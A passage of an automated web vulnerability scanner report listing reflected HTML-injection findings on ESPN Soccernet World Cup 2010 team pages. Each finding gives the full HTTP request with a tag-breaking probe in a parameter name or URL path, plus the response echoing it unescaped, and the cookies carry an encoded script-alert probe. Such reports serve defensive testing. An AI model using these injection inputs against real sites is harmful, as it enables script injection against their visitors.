Path: /worldcup2010/team/_/team/212/uruguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:37 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT
Content-Length: 81718
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point"> ...[SNIP]...
2.66. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/215/honduras
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT
Content-Length: 81826
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run"> ...[SNIP]...
2.68. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/2666/new-zealand
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:18 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT
Content-Length: 82203
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT
Content-Length: 81725
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through"> ...[SNIP]...
2.70. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4469/ghana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT
Content-Length: 81833
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT
Content-Length: 80274
Connection: close
